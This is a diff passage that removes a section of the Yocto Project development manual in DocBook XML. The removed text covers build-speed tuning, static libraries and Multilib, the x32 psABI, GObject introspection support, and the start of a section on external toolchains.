-                                    <listitem><para>
-                                        Once you have the correct source
-                                        revisions, you can modify those recipes
-                                        to to set <filename>SRCREV</filename>
-                                        to specific versions of the software.
-                                        </para></listitem>
-                                </orderedlist>
-                            </para>
-                        </note>
-                        </para></listitem>
-                </orderedlist>
-            </para>
-        </section>
-    </section>
-
-    <section id='speeding-up-a-build'>
-        <title>Speeding Up a Build</title>
-
-        <para>
-            Build time can be an issue.
-            By default, the build system uses simple controls to try and maximize
-            build efficiency.
-            In general, the default settings for all the following variables
-            result in the most efficient build times when dealing with single
-            socket systems (i.e. a single CPU).
-            If you have multiple CPUs, you might try increasing the default
-            values to gain more speed.
-            See the descriptions in the glossary for each variable for more
-            information:
-            <itemizedlist>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-BB_NUMBER_THREADS'><filename>BB_NUMBER_THREADS</filename>:</ulink>
-                    The maximum number of threads BitBake simultaneously executes.
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_BB_URL;#var-BB_NUMBER_PARSE_THREADS'><filename>BB_NUMBER_PARSE_THREADS</filename>:</ulink>
-                    The number of threads BitBake uses during parsing.
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PARALLEL_MAKE'><filename>PARALLEL_MAKE</filename>:</ulink>
-                    Extra options passed to the <filename>make</filename> command
-                    during the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-compile'><filename>do_compile</filename></ulink>
-                    task in order to specify parallel compilation on the
-                    local build host.
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PARALLEL_MAKEINST'><filename>PARALLEL_MAKEINST</filename>:</ulink>
-                    Extra options passed to the <filename>make</filename> command
-                    during the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>
-                    task in order to specify parallel installation on the
-                    local build host.
-                    </para></listitem>
-            </itemizedlist>
-            As mentioned, these variables all scale to the number of processor
-            cores available on the build system.
-            For single socket systems, this auto-scaling ensures that the build
-            system fundamentally takes advantage of potential parallel operations
-            during the build based on the build machine's capabilities.
-        </para>
-
-        <para>
-            Following are additional factors that can affect build speed:
-            <itemizedlist>
-                <listitem><para>
-                    File system type:
-                    The file system type that the build is being performed on can
-                    also influence performance.
-                    Using <filename>ext4</filename> is recommended as compared
-                    to <filename>ext2</filename> and <filename>ext3</filename>
-                    due to <filename>ext4</filename> improved features
-                    such as extents.
-                    </para></listitem>
-                <listitem><para>
-                    Disabling the updating of access time using
-                    <filename>noatime</filename>:
-                    The <filename>noatime</filename> mount option prevents the
-                    build system from updating file and directory access times.
-                    </para></listitem>
-                <listitem><para>
-                    Setting a longer commit:
-                    Using the "commit=" mount option increases the interval
-                    in seconds between disk cache writes.
-                    Changing this interval from the five second default to
-                    something longer increases the risk of data loss but decreases
-                    the need to write to the disk, thus increasing the build
-                    performance.
-                    </para></listitem>
-                <listitem><para>
-                    Choosing the packaging backend:
-                    Of the available packaging backends, IPK is the fastest.
-                    Additionally, selecting a singular packaging backend also
-                    helps.
-                    </para></listitem>
-                <listitem><para>
-                    Using <filename>tmpfs</filename> for
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink>
-                    as a temporary file system:
-                    While this can help speed up the build, the benefits are
-                    limited due to the compiler using
-                    <filename>-pipe</filename>.
-                    The build system goes to some lengths to avoid
-                    <filename>sync()</filename> calls into the
-                    file system on the principle that if there was a significant
-                    failure, the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
-                    contents could easily be rebuilt.
-                    </para></listitem>
-                <listitem><para>
-                    Inheriting the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-rm-work'><filename>rm_work</filename></ulink>
-                    class:
-                    Inheriting this class has shown to speed up builds due to
-                    significantly lower amounts of data stored in the data
-                    cache as well as on disk.
-                    Inheriting this class also makes cleanup of
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink>
-                    faster, at the expense of being easily able to dive into the
-                    source code.
-                    File system maintainers have recommended that the fastest way
-                    to clean up large numbers of files is to reformat partitions
-                    rather than delete files due to the linear nature of
-                    partitions.
-                    This, of course, assumes you structure the disk partitions and
-                    file systems in a way that this is practical.
-                    </para></listitem>
-            </itemizedlist>
-            Aside from the previous list, you should keep some trade offs in
-            mind that can help you speed up the build:
-            <itemizedlist>
-                <listitem><para>
-                    Remove items from
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></ulink>
-                    that you might not need.
-                    </para></listitem>
-                <listitem><para>
-                    Exclude debug symbols and other debug information:
-                    If you do not need these symbols and other debug information,
-                    disabling the <filename>*-dbg</filename> package generation
-                    can speed up the build.
-                    You can disable this generation by setting the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-INHIBIT_PACKAGE_DEBUG_SPLIT'><filename>INHIBIT_PACKAGE_DEBUG_SPLIT</filename></ulink>
-                    variable to "1".
-                    </para></listitem>
-                <listitem><para>
-                    Disable static library generation for recipes derived from
-                    <filename>autoconf</filename> or <filename>libtool</filename>:
-                    Following is an example showing how to disable static
-                    libraries and still provide an override to handle exceptions:
-                    <literallayout class='monospaced'>
-     STATICLIBCONF = "--disable-static"
-     STATICLIBCONF_sqlite3-native = ""
-     EXTRA_OECONF += "${STATICLIBCONF}"
-                    </literallayout>
-                    <note><title>Notes</title>
-                        <itemizedlist>
-                            <listitem><para>
-                                Some recipes need static libraries in order to work
-                                correctly (e.g. <filename>pseudo-native</filename>
-                                needs <filename>sqlite3-native</filename>).
-                                Overrides, as in the previous example, account for
-                                these kinds of exceptions.
-                                </para></listitem>
-                            <listitem><para>
-                                Some packages have packaging code that assumes the
-                                presence of the static libraries.
-                                If so, you might need to exclude them as well.
-                                </para></listitem>
-                        </itemizedlist>
-                    </note>
-                </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id="platdev-working-with-libraries">
-        <title>Working With Libraries</title>
-
-        <para>
-            Libraries are an integral part of your system.
-            This section describes some common practices you might find
-            helpful when working with libraries to build your system:
-            <itemizedlist>
-                <listitem><para><link linkend='including-static-library-files'>How to include static library files</link>
-                    </para></listitem>
-                <listitem><para><link linkend='combining-multiple-versions-library-files-into-one-image'>How to use the Multilib feature to combine multiple versions of library files into a single image</link>
-                    </para></listitem>
-                <listitem><para><link linkend='installing-multiple-versions-of-the-same-library'>How to install multiple versions of the same library in parallel on the same system</link>
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <section id='including-static-library-files'>
-            <title>Including Static Library Files</title>
-
-            <para>
-                If you are building a library and the library offers static linking, you can control
-                which static library files (<filename>*.a</filename> files) get included in the
-                built library.
-            </para>
-
-            <para>
-                The <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGES'><filename>PACKAGES</filename></ulink>
-                and <ulink url='&YOCTO_DOCS_REF_URL;#var-FILES'><filename>FILES_*</filename></ulink>
-                variables in the
-                <filename>meta/conf/bitbake.conf</filename> configuration file define how files installed
-                by the <filename>do_install</filename> task are packaged.
-                By default, the <filename>PACKAGES</filename> variable includes
-                <filename>${PN}-staticdev</filename>, which represents all static library files.
-                <note>
-                    Some previously released versions of the Yocto Project
-                    defined the static library files through
-                    <filename>${PN}-dev</filename>.
-                </note>
-                Following is part of the BitBake configuration file, where
-                you can see how the static library files are defined:
-                <literallayout class='monospaced'>
-     PACKAGE_BEFORE_PN ?= ""
-     PACKAGES = "${PN}-dbg ${PN}-staticdev ${PN}-dev ${PN}-doc ${PN}-locale ${PACKAGE_BEFORE_PN} ${PN}"
-     PACKAGES_DYNAMIC = "^${PN}-locale-.*"
-     FILES = ""
-
-     FILES_${PN} = "${bindir}/* ${sbindir}/* ${libexecdir}/* ${libdir}/lib*${SOLIBS} \
-                 ${sysconfdir} ${sharedstatedir} ${localstatedir} \
-                 ${base_bindir}/* ${base_sbindir}/* \
-                 ${base_libdir}/*${SOLIBS} \
-                 ${base_prefix}/lib/udev/rules.d ${prefix}/lib/udev/rules.d \
-                 ${datadir}/${BPN} ${libdir}/${BPN}/* \
-                 ${datadir}/pixmaps ${datadir}/applications \
-                 ${datadir}/idl ${datadir}/omf ${datadir}/sounds \
-                 ${libdir}/bonobo/servers"
-
-     FILES_${PN}-bin = "${bindir}/* ${sbindir}/*"
-
-     FILES_${PN}-doc = "${docdir} ${mandir} ${infodir} ${datadir}/gtk-doc \
-                 ${datadir}/gnome/help"
-     SECTION_${PN}-doc = "doc"
-
-     FILES_SOLIBSDEV ?= "${base_libdir}/lib*${SOLIBSDEV} ${libdir}/lib*${SOLIBSDEV}"
-     FILES_${PN}-dev = "${includedir} ${FILES_SOLIBSDEV} ${libdir}/*.la \
-                     ${libdir}/*.o ${libdir}/pkgconfig ${datadir}/pkgconfig \
-                     ${datadir}/aclocal ${base_libdir}/*.o \
-                     ${libdir}/${BPN}/*.la ${base_libdir}/*.la"
-     SECTION_${PN}-dev = "devel"
-     ALLOW_EMPTY_${PN}-dev = "1"
-     RDEPENDS_${PN}-dev = "${PN} (= ${EXTENDPKGV})"
-
-     FILES_${PN}-staticdev = "${libdir}/*.a ${base_libdir}/*.a ${libdir}/${BPN}/*.a"
-     SECTION_${PN}-staticdev = "devel"
-     RDEPENDS_${PN}-staticdev = "${PN}-dev (= ${EXTENDPKGV})"
-                </literallayout>
-            </para>
-        </section>
-
-        <section id="combining-multiple-versions-library-files-into-one-image">
-            <title>Combining Multiple Versions of Library Files into One Image</title>
-
-            <para>
-                The build system offers the ability to build libraries with different
-                target optimizations or architecture formats and combine these together
-                into one system image.
-                You can link different binaries in the image
-                against the different libraries as needed for specific use cases.
-                This feature is called "Multilib."
-            </para>
-
-            <para>
-                An example would be where you have most of a system compiled in 32-bit
-                mode using 32-bit libraries, but you have something large, like a database
-                engine, that needs to be a 64-bit application and uses 64-bit libraries.
-                Multilib allows you to get the best of both 32-bit and 64-bit libraries.
-            </para>
-
-            <para>
-                While the Multilib feature is most commonly used for 32 and 64-bit differences,
-                the approach the build system uses facilitates different target optimizations.
-                You could compile some binaries to use one set of libraries and other binaries
-                to use a different set of libraries.
-                The libraries could differ in architecture, compiler options, or other
-                optimizations.
-            </para>
-
-            <para>
-                Several examples exist in the
-                <filename>meta-skeleton</filename> layer found in the
-               <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>:
-                <itemizedlist>
-                    <listitem><para><filename>conf/multilib-example.conf</filename>
-                        configuration file</para></listitem>
-                    <listitem><para><filename>conf/multilib-example2.conf</filename>
-                        configuration file</para></listitem>
-                    <listitem><para><filename>recipes-multilib/images/core-image-multilib-example.bb</filename>
-                        recipe</para></listitem>
-                </itemizedlist>
-            </para>
-
-            <section id='preparing-to-use-multilib'>
-                <title>Preparing to Use Multilib</title>
-
-                <para>
-                    User-specific requirements drive the Multilib feature.
-                    Consequently, there is no one "out-of-the-box" configuration that likely
-                    exists to meet your needs.
-                </para>
-
-                <para>
-                    In order to enable Multilib, you first need to ensure your recipe is
-                    extended to support multiple libraries.
-                    Many standard recipes are already extended and support multiple libraries.
-                    You can check in the <filename>meta/conf/multilib.conf</filename>
-                    configuration file in the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink> to see how this is
-                    done using the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-BBCLASSEXTEND'><filename>BBCLASSEXTEND</filename></ulink>
-                    variable.
-                    Eventually, all recipes will be covered and this list will
-                    not be needed.
-                </para>
-
-                <para>
-                    For the most part, the Multilib class extension works automatically to
-                    extend the package name from <filename>${PN}</filename> to
-                    <filename>${MLPREFIX}${PN}</filename>, where <filename>MLPREFIX</filename>
-                    is the particular multilib (e.g. "lib32-" or "lib64-").
-                    Standard variables such as
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>,
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-RDEPENDS'><filename>RDEPENDS</filename></ulink>,
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-RPROVIDES'><filename>RPROVIDES</filename></ulink>,
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-RRECOMMENDS'><filename>RRECOMMENDS</filename></ulink>,
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGES'><filename>PACKAGES</filename></ulink>, and
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGES_DYNAMIC'><filename>PACKAGES_DYNAMIC</filename></ulink>
-                    are automatically extended by the system.
-                    If you are extending any manual code in the recipe, you can use the
-                    <filename>${MLPREFIX}</filename> variable to ensure those names are extended
-                    correctly.
-                    This automatic extension code resides in <filename>multilib.bbclass</filename>.
-                </para>
-            </section>
-
-            <section id='using-multilib'>
-                <title>Using Multilib</title>
-
-                <para>
-                    After you have set up the recipes, you need to define the actual
-                    combination of multiple libraries you want to build.
-                    You accomplish this through your <filename>local.conf</filename>
-                    configuration file in the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
-                    An example configuration would be as follows:
-                    <literallayout class='monospaced'>
-     MACHINE = "qemux86-64"
-     require conf/multilib.conf
-     MULTILIBS = "multilib:lib32"
-     DEFAULTTUNE_virtclass-multilib-lib32 = "x86"
-     IMAGE_INSTALL_append = " lib32-glib-2.0"
-                    </literallayout>
-                    This example enables an
-                    additional library named <filename>lib32</filename> alongside the
-                    normal target packages.
-                    When combining these "lib32" alternatives, the example uses "x86" for tuning.
-                    For information on this particular tuning, see
-                    <filename>meta/conf/machine/include/ia32/arch-ia32.inc</filename>.
-                </para>
-
-                <para>
-                    The example then includes <filename>lib32-glib-2.0</filename>
-                    in all the images, which illustrates one method of including a
-                    multiple library dependency.
-                    You can use a normal image build to include this dependency,
-                    for example:
-                    <literallayout class='monospaced'>
-     $ bitbake core-image-sato
-                    </literallayout>
-                    You can also build Multilib packages specifically with a command like this:
-                    <literallayout class='monospaced'>
-     $ bitbake lib32-glib-2.0
-                    </literallayout>
-                </para>
-            </section>
-
-            <section id='additional-implementation-details'>
-                <title>Additional Implementation Details</title>
-
-                <para>
-                    Generic implementation details as well as details that are
-                    specific to package management systems exist.
-                    Following are implementation details that exist regardless
-                    of the package management system:
-                    <itemizedlist>
-                        <listitem><para>The typical convention used for the
-                            class extension code as used by
-                            Multilib assumes that all package names specified
-                            in
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGES'><filename>PACKAGES</filename></ulink>
-                            that contain <filename>${PN}</filename> have
-                            <filename>${PN}</filename> at the start of the name.
-                            When that convention is not followed and
-                            <filename>${PN}</filename> appears at
-                            the middle or the end of a name, problems occur.
-                            </para></listitem>
-                        <listitem><para>The
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-TARGET_VENDOR'><filename>TARGET_VENDOR</filename></ulink>
-                            value under Multilib will be extended to
-                            "-<replaceable>vendor</replaceable>ml<replaceable>multilib</replaceable>"
-                            (e.g. "-pokymllib32" for a "lib32" Multilib with
-                            Poky).
-                            The reason for this slightly unwieldy contraction
-                            is that any "-" characters in the vendor
-                            string presently break Autoconf's
-                            <filename>config.sub</filename>, and
-                            other separators are problematic for different
-                            reasons.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-
-                <para>
-                    For the RPM Package Management System, the following implementation details
-                    exist:
-                    <itemizedlist>
-                        <listitem><para>A unique architecture is defined for the Multilib packages,
-                            along with creating a unique deploy folder under
-                            <filename>tmp/deploy/rpm</filename> in the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
-                            For example, consider <filename>lib32</filename> in a
-                            <filename>qemux86-64</filename> image.
-                            The possible architectures in the system are "all", "qemux86_64",
-                            "lib32_qemux86_64", and "lib32_x86".</para></listitem>
-                        <listitem><para>The <filename>${MLPREFIX}</filename> variable is stripped from
-                            <filename>${PN}</filename> during RPM packaging.
-                            The naming for a normal RPM package and a Multilib RPM package in a
-                            <filename>qemux86-64</filename> system resolves to something similar to
-                            <filename>bash-4.1-r2.x86_64.rpm</filename> and
-                            <filename>bash-4.1.r2.lib32_x86.rpm</filename>, respectively.
-                            </para></listitem>
-                        <listitem><para>When installing a Multilib image, the RPM backend first
-                            installs the base image and then installs the Multilib libraries.
-                            </para></listitem>
-                        <listitem><para>The build system relies on RPM to resolve the identical files in the
-                            two (or more) Multilib packages.</para></listitem>
-                    </itemizedlist>
-                </para>
-
-                <para>
-                    For the IPK Package Management System, the following implementation details exist:
-                    <itemizedlist>
-                        <listitem><para>The <filename>${MLPREFIX}</filename> is not stripped from
-                            <filename>${PN}</filename> during IPK packaging.
-                            The naming for a normal RPM package and a Multilib IPK package in a
-                            <filename>qemux86-64</filename> system resolves to something like
-                            <filename>bash_4.1-r2.x86_64.ipk</filename> and
-                            <filename>lib32-bash_4.1-rw_x86.ipk</filename>, respectively.
-                            </para></listitem>
-                        <listitem><para>The IPK deploy folder is not modified with
-                            <filename>${MLPREFIX}</filename> because packages with and without
-                            the Multilib feature can exist in the same folder due to the
-                            <filename>${PN}</filename> differences.</para></listitem>
-                        <listitem><para>IPK defines a sanity check for Multilib installation
-                            using certain rules for file comparison, overridden, etc.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </section>
-        </section>
-
-        <section id='installing-multiple-versions-of-the-same-library'>
-            <title>Installing Multiple Versions of the Same Library</title>
-
-            <para>
-                Situations can exist where you need to install and use
-                multiple versions of the same library on the same system
-                at the same time.
-                These situations almost always exist when a library API
-                changes and you have multiple pieces of software that
-                depend on the separate versions of the library.
-                To accommodate these situations, you can install multiple
-                versions of the same library in parallel on the same system.
-            </para>
-
-            <para>
-                The process is straightforward as long as the libraries use
-                proper versioning.
-                With properly versioned libraries, all you need to do to
-                individually specify the libraries is create separate,
-                appropriately named recipes where the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink> part of the
-                name includes a portion that differentiates each library version
-                (e.g.the major part of the version number).
-                Thus, instead of having a single recipe that loads one version
-                of a library (e.g. <filename>clutter</filename>), you provide
-                multiple recipes that result in different versions
-                of the libraries you want.
-                As an example, the following two recipes would allow the
-                two separate versions of the <filename>clutter</filename>
-                library to co-exist on the same system:
-                <literallayout class='monospaced'>
-     clutter-1.6_1.6.20.bb
-     clutter-1.8_1.8.4.bb
-                </literallayout>
-                Additionally, if you have other recipes that depend on a given
-                library, you need to use the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>
-                variable to create the dependency.
-                Continuing with the same example, if you want to have a recipe
-                depend on the 1.8 version of the <filename>clutter</filename>
-                library, use the following in your recipe:
-                <literallayout class='monospaced'>
-     DEPENDS = "clutter-1.8"
-                </literallayout>
-            </para>
-        </section>
-    </section>
-
-    <section id='using-x32-psabi'>
-        <title>Using x32 psABI</title>
-
-        <para>
-            x32 processor-specific Application Binary Interface
-            (<ulink url='https://software.intel.com/en-us/node/628948'>x32 psABI</ulink>)
-            is a native 32-bit processor-specific ABI for
-            <trademark class='registered'>Intel</trademark> 64 (x86-64)
-            architectures.
-            An ABI defines the calling conventions between functions in a
-            processing environment.
-            The interface determines what registers are used and what the
-            sizes are for various C data types.
-        </para>
-
-        <para>
-            Some processing environments prefer using 32-bit applications even
-            when running on Intel 64-bit platforms.
-            Consider the i386 psABI, which is a very old 32-bit ABI for Intel
-            64-bit platforms.
-            The i386 psABI does not provide efficient use and access of the
-            Intel 64-bit processor resources, leaving the system underutilized.
-            Now consider the x86_64 psABI.
-            This ABI is newer and uses 64-bits for data sizes and program
-            pointers.
-            The extra bits increase the footprint size of the programs,
-            libraries, and also increases the memory and file system size
-            requirements.
-            Executing under the x32 psABI enables user programs to utilize CPU
-            and system resources more efficiently while keeping the memory
-            footprint of the applications low.
-            Extra bits are used for registers but not for addressing mechanisms.
-        </para>
-
-        <para>
-            The Yocto Project supports the final specifications of x32 psABI
-            as follows:
-            <itemizedlist>
-                <listitem><para>
-                    You can create packages and images in x32 psABI format on
-                    x86_64 architecture targets.
-                    </para></listitem>
-                <listitem><para>
-                    You can successfully build recipes with the x32 toolchain.
-                    </para></listitem>
-                <listitem><para>
-                    You can create and boot
-                    <filename>core-image-minimal</filename> and
-                    <filename>core-image-sato</filename> images.
-                    </para></listitem>
-                <listitem><para>
-                    RPM Package Manager (RPM) support exists for x32 binaries.
-                    </para></listitem>
-                <listitem><para>
-                    Support for large images exists.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            To use the x32 psABI, you need to edit your
-            <filename>conf/local.conf</filename> configuration file as
-            follows:
-            <literallayout class='monospaced'>
-     MACHINE = "qemux86-64"
-     DEFAULTTUNE = "x86-64-x32"
-     baselib = "${@d.getVar('BASE_LIB_tune-' + (d.getVar('DEFAULTTUNE') \
-        or 'INVALID')) or 'lib'}"
-            </literallayout>
-            Once you have set up your configuration file, use BitBake to
-            build an image that supports the x32 psABI.
-            Here is an example:
-            <literallayout class='monospaced'>
-     $ bitbake core-image-sato
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='enabling-gobject-introspection-support'>
-        <title>Enabling GObject Introspection Support</title>
-
-        <para>
-            <ulink url='https://wiki.gnome.org/Projects/GObjectIntrospection'>GObject introspection</ulink>
-            is the standard mechanism for accessing GObject-based software
-            from runtime environments.
-            GObject is a feature of the GLib library that provides an object
-            framework for the GNOME desktop and related software.
-            GObject Introspection adds information to GObject that allows
-            objects created within it to be represented across different
-            programming languages.
-            If you want to construct GStreamer pipelines using Python, or
-            control UPnP infrastructure using Javascript and GUPnP,
-            GObject introspection is the only way to do it.
-        </para>
-
-        <para>
-            This section describes the Yocto Project support for generating
-            and packaging GObject introspection data.
-            GObject introspection data is a description of the
-            API provided by libraries built on top of GLib framework,
-            and, in particular, that framework's GObject mechanism.
-            GObject Introspection Repository (GIR) files go to
-            <filename>-dev</filename> packages,
-            <filename>typelib</filename> files go to main packages as they
-            are packaged together with libraries that are introspected.
-        </para>
-
-        <para>
-            The data is generated when building such a library, by linking
-            the library with a small executable binary that asks the library
-            to describe itself, and then executing the binary and
-            processing its output.
-        </para>
-
-        <para>
-            Generating this data in a cross-compilation environment
-            is difficult because the library is produced for the target
-            architecture, but its code needs to be executed on the build host.
-            This problem is solved with the OpenEmbedded build system by
-            running the code through QEMU, which allows precisely that.
-            Unfortunately, QEMU does not always work perfectly as mentioned
-            in the
-            "<link linkend='known-issues'>Known Issues</link>" section.
-        </para>
-
-        <section id='enabling-the-generation-of-introspection-data'>
-            <title>Enabling the Generation of Introspection Data</title>
-
-            <para>
-                Enabling the generation of introspection data (GIR files)
-                in your library package involves the following:
-                <orderedlist>
-                    <listitem><para>
-                        Inherit the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-gobject-introspection'><filename>gobject-introspection</filename></ulink>
-                        class.
-                        </para></listitem>
-                    <listitem><para>
-                        Make sure introspection is not disabled anywhere in
-                        the recipe or from anything the recipe includes.
-                        Also, make sure that "gobject-introspection-data" is
-                        not in
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_FEATURES_BACKFILL_CONSIDERED'><filename>DISTRO_FEATURES_BACKFILL_CONSIDERED</filename></ulink>
-                        and that "qemu-usermode" is not in
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_FEATURES_BACKFILL_CONSIDERED'><filename>MACHINE_FEATURES_BACKFILL_CONSIDERED</filename></ulink>.
-                        If either of these conditions exist, nothing will
-                        happen.
-                        </para></listitem>
-                    <listitem><para>
-                        Try to build the recipe.
-                        If you encounter build errors that look like
-                        something is unable to find
-                        <filename>.so</filename> libraries, check where these
-                        libraries are located in the source tree and add
-                        the following to the recipe:
-                        <literallayout class='monospaced'>
-     GIR_EXTRA_LIBS_PATH = "${B}/<replaceable>something</replaceable>/.libs"
-                        </literallayout>
-                        <note>
-                            See recipes in the <filename>oe-core</filename>
-                            repository that use that
-                            <filename>GIR_EXTRA_LIBS_PATH</filename> variable
-                            as an example.
-                        </note>
-                        </para></listitem>
-                    <listitem><para>
-                        Look for any other errors, which probably mean that
-                        introspection support in a package is not entirely
-                        standard, and thus breaks down in a cross-compilation
-                        environment.
-                        For such cases, custom-made fixes are needed.
-                        A good place to ask and receive help in these cases
-                        is the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#resources-mailinglist'>Yocto Project mailing lists</ulink>.
-                        </para></listitem>
-                </orderedlist>
-                <note>
-                    Using a library that no longer builds against the latest
-                    Yocto Project release and prints introspection related
-                    errors is a good candidate for the previous procedure.
-                </note>
-            </para>
-        </section>
-
-        <section id='disabling-the-generation-of-introspection-data'>
-            <title>Disabling the Generation of Introspection Data</title>
-
-            <para>
-                You might find that you do not want to generate
-                introspection data.
-                Or, perhaps QEMU does not work on your build host and
-                target architecture combination.
-                If so, you can use either of the following methods to
-                disable GIR file generations:
-                <itemizedlist>
-                    <listitem><para>
-                        Add the following to your distro configuration:
-                        <literallayout class='monospaced'>
-     DISTRO_FEATURES_BACKFILL_CONSIDERED = "gobject-introspection-data"
-                        </literallayout>
-                        Adding this statement disables generating
-                        introspection data using QEMU but will still enable
-                        building introspection tools and libraries
-                        (i.e. building them does not require the use of QEMU).
-                        </para></listitem>
-                    <listitem><para>
-                        Add the following to your machine configuration:
-                        <literallayout class='monospaced'>
-     MACHINE_FEATURES_BACKFILL_CONSIDERED = "qemu-usermode"
-                        </literallayout>
-                        Adding this statement disables the use of QEMU
-                        when building packages for your machine.
-                        Currently, this feature is used only by introspection
-                        recipes and has the same effect as the previously
-                        described option.
-                        <note>
-                            Future releases of the Yocto Project might have
-                            other features affected by this option.
-                        </note>
-                        </para></listitem>
-                </itemizedlist>
-                If you disable introspection data, you can still
-                obtain it through other means such as copying the data
-                from a suitable sysroot, or by generating it on the
-                target hardware.
-                The OpenEmbedded build system does not currently
-                provide specific support for these techniques.
-            </para>
-        </section>
-
-        <section id='testing-that-introspection-works-in-an-image'>
-            <title>Testing that Introspection Works in an Image</title>
-
-            <para>
-                Use the following procedure to test if generating
-                introspection data is working in an image:
-                <orderedlist>
-                    <listitem><para>
-                        Make sure that "gobject-introspection-data" is not in
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_FEATURES_BACKFILL_CONSIDERED'><filename>DISTRO_FEATURES_BACKFILL_CONSIDERED</filename></ulink>
-                        and that "qemu-usermode" is not in
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_FEATURES_BACKFILL_CONSIDERED'><filename>MACHINE_FEATURES_BACKFILL_CONSIDERED</filename></ulink>.
-                        </para></listitem>
-                    <listitem><para>
-                        Build <filename>core-image-sato</filename>.
-                        </para></listitem>
-                    <listitem><para>
-                        Launch a Terminal and then start Python in the
-                        terminal.
-                        </para></listitem>
-                    <listitem><para>
-                        Enter the following in the terminal:
-                        <literallayout class='monospaced'>
-     >>> from gi.repository import GLib
-     >>> GLib.get_host_name()
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        For something a little more advanced, enter the
-                        following:
-                        <literallayout class='monospaced'>
-     http://python-gtk-3-tutorial.readthedocs.org/en/latest/introduction.html
-                        </literallayout>
-                        </para></listitem>
-                </orderedlist>
-            </para>
-        </section>
-
-        <section id='known-issues'>
-            <title>Known Issues</title>
-
-            <para>
-                The following know issues exist for
-                GObject Introspection Support:
-                <itemizedlist>
-                    <listitem><para>
-                        <filename>qemu-ppc64</filename> immediately crashes.
-                        Consequently, you cannot build introspection data on
-                        that architecture.
-                        </para></listitem>
-                    <listitem><para>
-                        x32 is not supported by QEMU.
-                        Consequently, introspection data is disabled.
-                        </para></listitem>
-                    <listitem><para>
-                        musl causes transient GLib binaries to crash on
-                        assertion failures.
-                        Consequently, generating introspection data is
-                        disabled.
-                        </para></listitem>
-                    <listitem><para>
-                        Because QEMU is not able to run the binaries correctly,
-                        introspection is disabled for some specific packages
-                        under specific architectures (e.g.
-                        <filename>gcr</filename>,
-                        <filename>libsecret</filename>, and
-                        <filename>webkit</filename>).
-                        </para></listitem>
-                    <listitem><para>
-                        QEMU usermode might not work properly when running
-                        64-bit binaries under 32-bit host machines.
-                        In particular, "qemumips64" is known to not work under
-                        i686.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-    </section>
-
-    <section id='dev-optionally-using-an-external-toolchain'>
-        <title>Optionally Using an External Toolchain</title>
-
-        <para>
-            You might want to use an external toolchain as part of your
-            development.
-            If this is the case, the fundamental steps you need to accomplish
-            are as follows:
-            <itemizedlist>
-                <listitem><para>
-                    Understand where the installed toolchain resides.
-                    For cases where you need to build the external toolchain,
-                    you would need to take separate steps to build and install
-                    the toolchain.
-                    </para></listitem>
-                <listitem><para>
-                    Make sure you add the layer that contains the toolchain to
-                    your <filename>bblayers.conf</filename> file through the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-BBLAYERS'><filename>BBLAYERS</filename></ulink>
-                    variable.
-                    </para></listitem>
-                <listitem><para>
-                    Set the <filename>EXTERNAL_TOOLCHAIN</filename>
-                    variable in your <filename>local.conf</filename> file
-                    to the location in which you installed the toolchain.
-                    </para></listitem>
-            </itemizedlist>
-            A good example of an external toolchain used with the Yocto Project
-            is <trademark class='registered'>Mentor Graphics</trademark>
-            Sourcery G++ Toolchain.
-            You can see information on how to use that particular layer in the
-            <filename>README</filename> file at
-            <ulink url='http://github.com/MentorEmbedded/meta-sourcery/'></ulink>.
-            You can find further information by reading about the
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-TCMODE'><filename>TCMODE</filename></ulink>
